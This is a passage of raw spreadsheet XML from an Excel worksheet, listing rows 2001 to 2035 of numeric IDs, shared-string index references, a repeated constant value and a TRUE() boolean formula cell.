      <c r="A2001" s="1">
        <v>18369</v>
      </c>
      <c r="B2001" t="s">
        <v>0</v>
      </c>
      <c r="C2001" t="s">
        <v>78</v>
      </c>
      <c r="D2001" t="s">
        <v>2097</v>
      </c>
      <c r="E2001" t="s">
        <v>1227</v>
      </c>
      <c r="F2001">
        <v>29117300</v>
      </c>
      <c r="G2001" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2001" t="s">
        <v>2339</v>
      </c>
      <c r="K2001">
        <v>0</v>
      </c>
      <c r="L2001" t="s">
        <v>98</v>
      </c>
      <c r="R2001" t="s">
        <v>5</v>
      </c>
      <c r="S2001" t="s">
        <v>1229</v>
      </c>
      <c r="T2001" t="s">
        <v>7</v>
      </c>
      <c r="U2001" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2002" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2002" s="1">
        <v>18370</v>
      </c>
      <c r="B2002" t="s">
        <v>0</v>
      </c>
      <c r="C2002" t="s">
        <v>78</v>
      </c>
      <c r="D2002" t="s">
        <v>2097</v>
      </c>
      <c r="E2002" t="s">
        <v>1227</v>
      </c>
      <c r="F2002">
        <v>29117300</v>
      </c>
      <c r="G2002" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2002" t="s">
        <v>2340</v>
      </c>
      <c r="K2002">
        <v>0</v>
      </c>
      <c r="L2002" t="s">
        <v>98</v>
      </c>
      <c r="R2002" t="s">
        <v>5</v>
      </c>
      <c r="S2002" t="s">
        <v>1229</v>
      </c>
      <c r="T2002" t="s">
        <v>7</v>
      </c>
      <c r="U2002" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2003" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2003" s="1">
        <v>18371</v>
      </c>
      <c r="B2003" t="s">
        <v>0</v>
      </c>
      <c r="C2003" t="s">
        <v>78</v>
      </c>
      <c r="D2003" t="s">
        <v>2097</v>
      </c>
      <c r="E2003" t="s">
        <v>1227</v>
      </c>
      <c r="F2003">
        <v>29117300</v>
      </c>
      <c r="G2003" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2003" t="s">
        <v>2341</v>
      </c>
      <c r="K2003">
        <v>0</v>
      </c>
      <c r="L2003" t="s">
        <v>98</v>
      </c>
      <c r="R2003" t="s">
        <v>5</v>
      </c>
      <c r="S2003" t="s">
        <v>1229</v>
      </c>
      <c r="T2003" t="s">
        <v>7</v>
      </c>
      <c r="U2003" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2004" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2004" s="1">
        <v>18372</v>
      </c>
      <c r="B2004" t="s">
        <v>0</v>
      </c>
      <c r="C2004" t="s">
        <v>78</v>
      </c>
      <c r="D2004" t="s">
        <v>2097</v>
      </c>
      <c r="E2004" t="s">
        <v>1227</v>
      </c>
      <c r="F2004">
        <v>29117300</v>
      </c>
      <c r="G2004" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2004" t="s">
        <v>2342</v>
      </c>
      <c r="K2004">
        <v>0</v>
      </c>
      <c r="L2004" t="s">
        <v>98</v>
      </c>
      <c r="R2004" t="s">
        <v>5</v>
      </c>
      <c r="S2004" t="s">
        <v>1229</v>
      </c>
      <c r="T2004" t="s">
        <v>7</v>
      </c>
      <c r="U2004" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2005" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2005" s="1">
        <v>18373</v>
      </c>
      <c r="B2005" t="s">
        <v>0</v>
      </c>
      <c r="C2005" t="s">
        <v>78</v>
      </c>
      <c r="D2005" t="s">
        <v>2097</v>
      </c>
      <c r="E2005" t="s">
        <v>1227</v>
      </c>
      <c r="F2005">
        <v>29117300</v>
      </c>
      <c r="G2005" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2005" t="s">
        <v>2343</v>
      </c>
      <c r="K2005">
        <v>0</v>
      </c>
      <c r="L2005" t="s">
        <v>98</v>
      </c>
      <c r="R2005" t="s">
        <v>5</v>
      </c>
      <c r="S2005" t="s">
        <v>1229</v>
      </c>
      <c r="T2005" t="s">
        <v>7</v>
      </c>
      <c r="U2005" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2006" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2006" s="1">
        <v>18374</v>
      </c>
      <c r="B2006" t="s">
        <v>0</v>
      </c>
      <c r="C2006" t="s">
        <v>78</v>
      </c>
      <c r="D2006" t="s">
        <v>2097</v>
      </c>
      <c r="E2006" t="s">
        <v>1227</v>
      </c>
      <c r="F2006">
        <v>29117300</v>
      </c>
      <c r="G2006" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2006" t="s">
        <v>2344</v>
      </c>
      <c r="K2006">
        <v>0</v>
      </c>
      <c r="L2006" t="s">
        <v>98</v>
      </c>
      <c r="R2006" t="s">
        <v>5</v>
      </c>
      <c r="S2006" t="s">
        <v>1229</v>
      </c>
      <c r="T2006" t="s">
        <v>7</v>
      </c>
      <c r="U2006" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2007" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2007" s="1">
        <v>18375</v>
      </c>
      <c r="B2007" t="s">
        <v>0</v>
      </c>
      <c r="C2007" t="s">
        <v>78</v>
      </c>
      <c r="D2007" t="s">
        <v>2097</v>
      </c>
      <c r="E2007" t="s">
        <v>1227</v>
      </c>
      <c r="F2007">
        <v>29117300</v>
      </c>
      <c r="G2007" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2007" t="s">
        <v>2345</v>
      </c>
      <c r="K2007">
        <v>0</v>
      </c>
      <c r="L2007" t="s">
        <v>98</v>
      </c>
      <c r="R2007" t="s">
        <v>5</v>
      </c>
      <c r="S2007" t="s">
        <v>1229</v>
      </c>
      <c r="T2007" t="s">
        <v>7</v>
      </c>
      <c r="U2007" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2008" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2008" s="1">
        <v>18376</v>
      </c>
      <c r="B2008" t="s">
        <v>0</v>
      </c>
      <c r="C2008" t="s">
        <v>78</v>
      </c>
      <c r="D2008" t="s">
        <v>2097</v>
      </c>
      <c r="E2008" t="s">
        <v>1227</v>
      </c>
      <c r="F2008">
        <v>29117300</v>
      </c>
      <c r="G2008" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2008" t="s">
        <v>2346</v>
      </c>
      <c r="K2008">
        <v>0</v>
      </c>
      <c r="L2008" t="s">
        <v>98</v>
      </c>
      <c r="R2008" t="s">
        <v>5</v>
      </c>
      <c r="S2008" t="s">
        <v>1229</v>
      </c>
      <c r="T2008" t="s">
        <v>7</v>
      </c>
      <c r="U2008" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2009" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2009" s="1">
        <v>18377</v>
      </c>
      <c r="B2009" t="s">
        <v>0</v>
      </c>
      <c r="C2009" t="s">
        <v>1</v>
      </c>
      <c r="D2009" t="s">
        <v>2097</v>
      </c>
      <c r="E2009" t="s">
        <v>1227</v>
      </c>
      <c r="F2009">
        <v>29117300</v>
      </c>
      <c r="G2009" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2009" t="s">
        <v>2347</v>
      </c>
      <c r="K2009">
        <v>0</v>
      </c>
      <c r="L2009" t="s">
        <v>98</v>
      </c>
      <c r="R2009" t="s">
        <v>5</v>
      </c>
      <c r="S2009" t="s">
        <v>1229</v>
      </c>
      <c r="T2009" t="s">
        <v>7</v>
      </c>
      <c r="U2009" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2010" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2010" s="1">
        <v>18378</v>
      </c>
      <c r="B2010" t="s">
        <v>0</v>
      </c>
      <c r="C2010" t="s">
        <v>78</v>
      </c>
      <c r="D2010" t="s">
        <v>2097</v>
      </c>
      <c r="E2010" t="s">
        <v>1227</v>
      </c>
      <c r="F2010">
        <v>29117300</v>
      </c>
      <c r="G2010" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2010" t="s">
        <v>2348</v>
      </c>
      <c r="K2010">
        <v>0</v>
      </c>
      <c r="L2010" t="s">
        <v>98</v>
      </c>
      <c r="R2010" t="s">
        <v>5</v>
      </c>
      <c r="S2010" t="s">
        <v>1229</v>
      </c>
      <c r="T2010" t="s">
        <v>7</v>
      </c>
      <c r="U2010" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2011" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2011" s="1">
        <v>18379</v>
      </c>
      <c r="B2011" t="s">
        <v>0</v>
      </c>
      <c r="C2011" t="s">
        <v>78</v>
      </c>
      <c r="D2011" t="s">
        <v>2097</v>
      </c>
      <c r="E2011" t="s">
        <v>1227</v>
      </c>
      <c r="F2011">
        <v>29117300</v>
      </c>
      <c r="G2011" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2011" t="s">
        <v>2349</v>
      </c>
      <c r="K2011">
        <v>0</v>
      </c>
      <c r="L2011" t="s">
        <v>98</v>
      </c>
      <c r="R2011" t="s">
        <v>5</v>
      </c>
      <c r="S2011" t="s">
        <v>1229</v>
      </c>
      <c r="T2011" t="s">
        <v>7</v>
      </c>
      <c r="U2011" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2012" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2012" s="1">
        <v>18380</v>
      </c>
      <c r="B2012" t="s">
        <v>0</v>
      </c>
      <c r="C2012" t="s">
        <v>78</v>
      </c>
      <c r="D2012" t="s">
        <v>2097</v>
      </c>
      <c r="E2012" t="s">
        <v>1227</v>
      </c>
      <c r="F2012">
        <v>29117300</v>
      </c>
      <c r="G2012" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2012" t="s">
        <v>2350</v>
      </c>
      <c r="K2012">
        <v>0</v>
      </c>
      <c r="L2012" t="s">
        <v>98</v>
      </c>
      <c r="R2012" t="s">
        <v>5</v>
      </c>
      <c r="S2012" t="s">
        <v>1229</v>
      </c>
      <c r="T2012" t="s">
        <v>7</v>
      </c>
      <c r="U2012" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2013" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2013" s="1">
        <v>18381</v>
      </c>
      <c r="B2013" t="s">
        <v>0</v>
      </c>
      <c r="C2013" t="s">
        <v>78</v>
      </c>
      <c r="D2013" t="s">
        <v>2097</v>
      </c>
      <c r="E2013" t="s">
        <v>1227</v>
      </c>
      <c r="F2013">
        <v>29117300</v>
      </c>
      <c r="G2013" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2013" t="s">
        <v>2351</v>
      </c>
      <c r="K2013">
        <v>0</v>
      </c>
      <c r="L2013" t="s">
        <v>98</v>
      </c>
      <c r="R2013" t="s">
        <v>5</v>
      </c>
      <c r="S2013" t="s">
        <v>1229</v>
      </c>
      <c r="T2013" t="s">
        <v>7</v>
      </c>
      <c r="U2013" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2014" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2014" s="1">
        <v>18382</v>
      </c>
      <c r="B2014" t="s">
        <v>0</v>
      </c>
      <c r="C2014" t="s">
        <v>78</v>
      </c>
      <c r="D2014" t="s">
        <v>2097</v>
      </c>
      <c r="E2014" t="s">
        <v>1227</v>
      </c>
      <c r="F2014">
        <v>29117300</v>
      </c>
      <c r="G2014" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2014" t="s">
        <v>2352</v>
      </c>
      <c r="K2014">
        <v>0</v>
      </c>
      <c r="L2014" t="s">
        <v>98</v>
      </c>
      <c r="R2014" t="s">
        <v>5</v>
      </c>
      <c r="S2014" t="s">
        <v>1229</v>
      </c>
      <c r="T2014" t="s">
        <v>7</v>
      </c>
      <c r="U2014" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2015" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2015" s="1">
        <v>18383</v>
      </c>
      <c r="B2015" t="s">
        <v>0</v>
      </c>
      <c r="C2015" t="s">
        <v>78</v>
      </c>
      <c r="D2015" t="s">
        <v>2097</v>
      </c>
      <c r="E2015" t="s">
        <v>1227</v>
      </c>
      <c r="F2015">
        <v>29117300</v>
      </c>
      <c r="G2015" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2015" t="s">
        <v>2353</v>
      </c>
      <c r="K2015">
        <v>0</v>
      </c>
      <c r="L2015" t="s">
        <v>98</v>
      </c>
      <c r="R2015" t="s">
        <v>5</v>
      </c>
      <c r="S2015" t="s">
        <v>1229</v>
      </c>
      <c r="T2015" t="s">
        <v>7</v>
      </c>
      <c r="U2015" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2016" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2016" s="1">
        <v>18384</v>
      </c>
      <c r="B2016" t="s">
        <v>0</v>
      </c>
      <c r="C2016" t="s">
        <v>78</v>
      </c>
      <c r="D2016" t="s">
        <v>2097</v>
      </c>
      <c r="E2016" t="s">
        <v>1227</v>
      </c>
      <c r="F2016">
        <v>29117300</v>
      </c>
      <c r="G2016" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2016" t="s">
        <v>2354</v>
      </c>
      <c r="K2016">
        <v>0</v>
      </c>
      <c r="L2016" t="s">
        <v>98</v>
      </c>
      <c r="R2016" t="s">
        <v>5</v>
      </c>
      <c r="S2016" t="s">
        <v>1229</v>
      </c>
      <c r="T2016" t="s">
        <v>7</v>
      </c>
      <c r="U2016" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2017" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2017" s="1">
        <v>18385</v>
      </c>
      <c r="B2017" t="s">
        <v>0</v>
      </c>
      <c r="C2017" t="s">
        <v>78</v>
      </c>
      <c r="D2017" t="s">
        <v>2097</v>
      </c>
      <c r="E2017" t="s">
        <v>1227</v>
      </c>
      <c r="F2017">
        <v>29117300</v>
      </c>
      <c r="G2017" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2017" t="s">
        <v>2355</v>
      </c>
      <c r="K2017">
        <v>0</v>
      </c>
      <c r="L2017" t="s">
        <v>98</v>
      </c>
      <c r="R2017" t="s">
        <v>5</v>
      </c>
      <c r="S2017" t="s">
        <v>1229</v>
      </c>
      <c r="T2017" t="s">
        <v>7</v>
      </c>
      <c r="U2017" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2018" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2018" s="1">
        <v>18386</v>
      </c>
      <c r="B2018" t="s">
        <v>0</v>
      </c>
      <c r="C2018" t="s">
        <v>78</v>
      </c>
      <c r="D2018" t="s">
        <v>2097</v>
      </c>
      <c r="E2018" t="s">
        <v>1227</v>
      </c>
      <c r="F2018">
        <v>29117300</v>
      </c>
      <c r="G2018" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2018" t="s">
        <v>2356</v>
      </c>
      <c r="K2018">
        <v>0</v>
      </c>
      <c r="L2018" t="s">
        <v>98</v>
      </c>
      <c r="R2018" t="s">
        <v>5</v>
      </c>
      <c r="S2018" t="s">
        <v>1229</v>
      </c>
      <c r="T2018" t="s">
        <v>7</v>
      </c>
      <c r="U2018" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2019" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2019" s="1">
        <v>18387</v>
      </c>
      <c r="B2019" t="s">
        <v>0</v>
      </c>
      <c r="C2019" t="s">
        <v>78</v>
      </c>
      <c r="D2019" t="s">
        <v>2097</v>
      </c>
      <c r="E2019" t="s">
        <v>1227</v>
      </c>
      <c r="F2019">
        <v>29117300</v>
      </c>
      <c r="G2019" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2019" t="s">
        <v>2357</v>
      </c>
      <c r="K2019">
        <v>0</v>
      </c>
      <c r="L2019" t="s">
        <v>98</v>
      </c>
      <c r="R2019" t="s">
        <v>5</v>
      </c>
      <c r="S2019" t="s">
        <v>1229</v>
      </c>
      <c r="T2019" t="s">
        <v>7</v>
      </c>
      <c r="U2019" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2020" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2020" s="1">
        <v>18388</v>
      </c>
      <c r="B2020" t="s">
        <v>0</v>
      </c>
      <c r="C2020" t="s">
        <v>78</v>
      </c>
      <c r="D2020" t="s">
        <v>2097</v>
      </c>
      <c r="E2020" t="s">
        <v>1227</v>
      </c>
      <c r="F2020">
        <v>29117300</v>
      </c>
      <c r="G2020" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2020" t="s">
        <v>2358</v>
      </c>
      <c r="K2020">
        <v>0</v>
      </c>
      <c r="L2020" t="s">
        <v>98</v>
      </c>
      <c r="R2020" t="s">
        <v>5</v>
      </c>
      <c r="S2020" t="s">
        <v>1229</v>
      </c>
      <c r="T2020" t="s">
        <v>7</v>
      </c>
      <c r="U2020" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2021" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2021" s="1">
        <v>18389</v>
      </c>
      <c r="B2021" t="s">
        <v>0</v>
      </c>
      <c r="C2021" t="s">
        <v>78</v>
      </c>
      <c r="D2021" t="s">
        <v>2097</v>
      </c>
      <c r="E2021" t="s">
        <v>1227</v>
      </c>
      <c r="F2021">
        <v>29117300</v>
      </c>
      <c r="G2021" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2021" t="s">
        <v>2359</v>
      </c>
      <c r="K2021">
        <v>0</v>
      </c>
      <c r="L2021" t="s">
        <v>98</v>
      </c>
      <c r="R2021" t="s">
        <v>5</v>
      </c>
      <c r="S2021" t="s">
        <v>1229</v>
      </c>
      <c r="T2021" t="s">
        <v>7</v>
      </c>
      <c r="U2021" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2022" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2022" s="1">
        <v>18390</v>
      </c>
      <c r="B2022" t="s">
        <v>0</v>
      </c>
      <c r="C2022" t="s">
        <v>1</v>
      </c>
      <c r="D2022" t="s">
        <v>2097</v>
      </c>
      <c r="E2022" t="s">
        <v>1227</v>
      </c>
      <c r="F2022">
        <v>29117300</v>
      </c>
      <c r="G2022" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2022" t="s">
        <v>2360</v>
      </c>
      <c r="K2022">
        <v>0</v>
      </c>
      <c r="L2022" t="s">
        <v>98</v>
      </c>
      <c r="R2022" t="s">
        <v>5</v>
      </c>
      <c r="S2022" t="s">
        <v>1229</v>
      </c>
      <c r="T2022" t="s">
        <v>7</v>
      </c>
      <c r="U2022" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2023" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2023" s="1">
        <v>18391</v>
      </c>
      <c r="B2023" t="s">
        <v>0</v>
      </c>
      <c r="C2023" t="s">
        <v>78</v>
      </c>
      <c r="D2023" t="s">
        <v>2097</v>
      </c>
      <c r="E2023" t="s">
        <v>1227</v>
      </c>
      <c r="F2023">
        <v>29117300</v>
      </c>
      <c r="G2023" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2023" t="s">
        <v>2361</v>
      </c>
      <c r="K2023">
        <v>0</v>
      </c>
      <c r="L2023" t="s">
        <v>98</v>
      </c>
      <c r="R2023" t="s">
        <v>5</v>
      </c>
      <c r="S2023" t="s">
        <v>1229</v>
      </c>
      <c r="T2023" t="s">
        <v>7</v>
      </c>
      <c r="U2023" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2024" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2024" s="1">
        <v>18392</v>
      </c>
      <c r="B2024" t="s">
        <v>0</v>
      </c>
      <c r="C2024" t="s">
        <v>1</v>
      </c>
      <c r="D2024" t="s">
        <v>2097</v>
      </c>
      <c r="E2024" t="s">
        <v>1227</v>
      </c>
      <c r="F2024">
        <v>29117300</v>
      </c>
      <c r="G2024" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2024" t="s">
        <v>2362</v>
      </c>
      <c r="K2024">
        <v>0</v>
      </c>
      <c r="L2024" t="s">
        <v>98</v>
      </c>
      <c r="R2024" t="s">
        <v>5</v>
      </c>
      <c r="S2024" t="s">
        <v>1229</v>
      </c>
      <c r="T2024" t="s">
        <v>7</v>
      </c>
      <c r="U2024" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2025" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2025" s="1">
        <v>18393</v>
      </c>
      <c r="B2025" t="s">
        <v>0</v>
      </c>
      <c r="C2025" t="s">
        <v>78</v>
      </c>
      <c r="D2025" t="s">
        <v>2097</v>
      </c>
      <c r="E2025" t="s">
        <v>1227</v>
      </c>
      <c r="F2025">
        <v>29117300</v>
      </c>
      <c r="G2025" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2025" t="s">
        <v>2363</v>
      </c>
      <c r="K2025">
        <v>0</v>
      </c>
      <c r="L2025" t="s">
        <v>98</v>
      </c>
      <c r="R2025" t="s">
        <v>5</v>
      </c>
      <c r="S2025" t="s">
        <v>1229</v>
      </c>
      <c r="T2025" t="s">
        <v>7</v>
      </c>
      <c r="U2025" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2026" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2026" s="1">
        <v>18394</v>
      </c>
      <c r="B2026" t="s">
        <v>0</v>
      </c>
      <c r="C2026" t="s">
        <v>78</v>
      </c>
      <c r="D2026" t="s">
        <v>2097</v>
      </c>
      <c r="E2026" t="s">
        <v>1227</v>
      </c>
      <c r="F2026">
        <v>29117300</v>
      </c>
      <c r="G2026" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2026" t="s">
        <v>2364</v>
      </c>
      <c r="K2026">
        <v>0</v>
      </c>
      <c r="L2026" t="s">
        <v>98</v>
      </c>
      <c r="R2026" t="s">
        <v>5</v>
      </c>
      <c r="S2026" t="s">
        <v>1229</v>
      </c>
      <c r="T2026" t="s">
        <v>7</v>
      </c>
      <c r="U2026" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2027" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2027" s="1">
        <v>18395</v>
      </c>
      <c r="B2027" t="s">
        <v>0</v>
      </c>
      <c r="C2027" t="s">
        <v>78</v>
      </c>
      <c r="D2027" t="s">
        <v>2097</v>
      </c>
      <c r="E2027" t="s">
        <v>1227</v>
      </c>
      <c r="F2027">
        <v>29117300</v>
      </c>
      <c r="G2027" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2027" t="s">
        <v>2365</v>
      </c>
      <c r="K2027">
        <v>0</v>
      </c>
      <c r="L2027" t="s">
        <v>98</v>
      </c>
      <c r="R2027" t="s">
        <v>5</v>
      </c>
      <c r="S2027" t="s">
        <v>1229</v>
      </c>
      <c r="T2027" t="s">
        <v>7</v>
      </c>
      <c r="U2027" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2028" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2028" s="1">
        <v>18396</v>
      </c>
      <c r="B2028" t="s">
        <v>0</v>
      </c>
      <c r="C2028" t="s">
        <v>78</v>
      </c>
      <c r="D2028" t="s">
        <v>2097</v>
      </c>
      <c r="E2028" t="s">
        <v>1227</v>
      </c>
      <c r="F2028">
        <v>29117300</v>
      </c>
      <c r="G2028" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2028" t="s">
        <v>2366</v>
      </c>
      <c r="K2028">
        <v>0</v>
      </c>
      <c r="L2028" t="s">
        <v>98</v>
      </c>
      <c r="R2028" t="s">
        <v>5</v>
      </c>
      <c r="S2028" t="s">
        <v>1229</v>
      </c>
      <c r="T2028" t="s">
        <v>7</v>
      </c>
      <c r="U2028" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2029" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2029" s="1">
        <v>18397</v>
      </c>
      <c r="B2029" t="s">
        <v>0</v>
      </c>
      <c r="C2029" t="s">
        <v>78</v>
      </c>
      <c r="D2029" t="s">
        <v>2097</v>
      </c>
      <c r="E2029" t="s">
        <v>1227</v>
      </c>
      <c r="F2029">
        <v>29117300</v>
      </c>
      <c r="G2029" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2029" t="s">
        <v>2367</v>
      </c>
      <c r="K2029">
        <v>0</v>
      </c>
      <c r="L2029" t="s">
        <v>98</v>
      </c>
      <c r="R2029" t="s">
        <v>5</v>
      </c>
      <c r="S2029" t="s">
        <v>1229</v>
      </c>
      <c r="T2029" t="s">
        <v>7</v>
      </c>
      <c r="U2029" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2030" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2030" s="1">
        <v>18398</v>
      </c>
      <c r="B2030" t="s">
        <v>0</v>
      </c>
      <c r="C2030" t="s">
        <v>78</v>
      </c>
      <c r="D2030" t="s">
        <v>2097</v>
      </c>
      <c r="E2030" t="s">
        <v>1227</v>
      </c>
      <c r="F2030">
        <v>29117300</v>
      </c>
      <c r="G2030" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2030" t="s">
        <v>2368</v>
      </c>
      <c r="K2030">
        <v>0</v>
      </c>
      <c r="L2030" t="s">
        <v>98</v>
      </c>
      <c r="R2030" t="s">
        <v>5</v>
      </c>
      <c r="S2030" t="s">
        <v>1229</v>
      </c>
      <c r="T2030" t="s">
        <v>7</v>
      </c>
      <c r="U2030" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2031" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2031" s="1">
        <v>18399</v>
      </c>
      <c r="B2031" t="s">
        <v>0</v>
      </c>
      <c r="C2031" t="s">
        <v>1</v>
      </c>
      <c r="D2031" t="s">
        <v>2097</v>
      </c>
      <c r="E2031" t="s">
        <v>1227</v>
      </c>
      <c r="F2031">
        <v>29117300</v>
      </c>
      <c r="G2031" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2031" t="s">
        <v>2369</v>
      </c>
      <c r="K2031">
        <v>0</v>
      </c>
      <c r="L2031" t="s">
        <v>98</v>
      </c>
      <c r="R2031" t="s">
        <v>5</v>
      </c>
      <c r="S2031" t="s">
        <v>1229</v>
      </c>
      <c r="T2031" t="s">
        <v>7</v>
      </c>
      <c r="U2031" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2032" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2032" s="1">
        <v>18400</v>
      </c>
      <c r="B2032" t="s">
        <v>0</v>
      </c>
      <c r="C2032" t="s">
        <v>78</v>
      </c>
      <c r="D2032" t="s">
        <v>2097</v>
      </c>
      <c r="E2032" t="s">
        <v>1227</v>
      </c>
      <c r="F2032">
        <v>29117300</v>
      </c>
      <c r="G2032" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2032" t="s">
        <v>2370</v>
      </c>
      <c r="K2032">
        <v>0</v>
      </c>
      <c r="L2032" t="s">
        <v>98</v>
      </c>
      <c r="R2032" t="s">
        <v>5</v>
      </c>
      <c r="S2032" t="s">
        <v>1229</v>
      </c>
      <c r="T2032" t="s">
        <v>7</v>
      </c>
      <c r="U2032" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2033" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2033" s="1">
        <v>18401</v>
      </c>
      <c r="B2033" t="s">
        <v>0</v>
      </c>
      <c r="C2033" t="s">
        <v>78</v>
      </c>
      <c r="D2033" t="s">
        <v>2097</v>
      </c>
      <c r="E2033" t="s">
        <v>1227</v>
      </c>
      <c r="F2033">
        <v>29117300</v>
      </c>
      <c r="G2033" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2033" t="s">
        <v>2371</v>
      </c>
      <c r="K2033">
        <v>0</v>
      </c>
      <c r="L2033" t="s">
        <v>98</v>
      </c>
      <c r="R2033" t="s">
        <v>5</v>
      </c>
      <c r="S2033" t="s">
        <v>1229</v>
      </c>
      <c r="T2033" t="s">
        <v>7</v>
      </c>
      <c r="U2033" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2034" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2034" s="1">
        <v>18402</v>
      </c>
      <c r="B2034" t="s">
        <v>0</v>
      </c>
      <c r="C2034" t="s">
        <v>78</v>
      </c>
      <c r="D2034" t="s">
        <v>2097</v>
      </c>
      <c r="E2034" t="s">
        <v>1227</v>
      </c>
      <c r="F2034">
        <v>29117300</v>
      </c>
      <c r="G2034" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2034" t="s">
        <v>2372</v>
      </c>
      <c r="K2034">
        <v>0</v>
      </c>
      <c r="L2034" t="s">
        <v>98</v>
      </c>
      <c r="R2034" t="s">
        <v>5</v>
      </c>
      <c r="S2034" t="s">
        <v>1229</v>
      </c>
      <c r="T2034" t="s">
        <v>7</v>
      </c>
      <c r="U2034" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2035" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2035" s="1">
        <v>18403</v>
      </c>
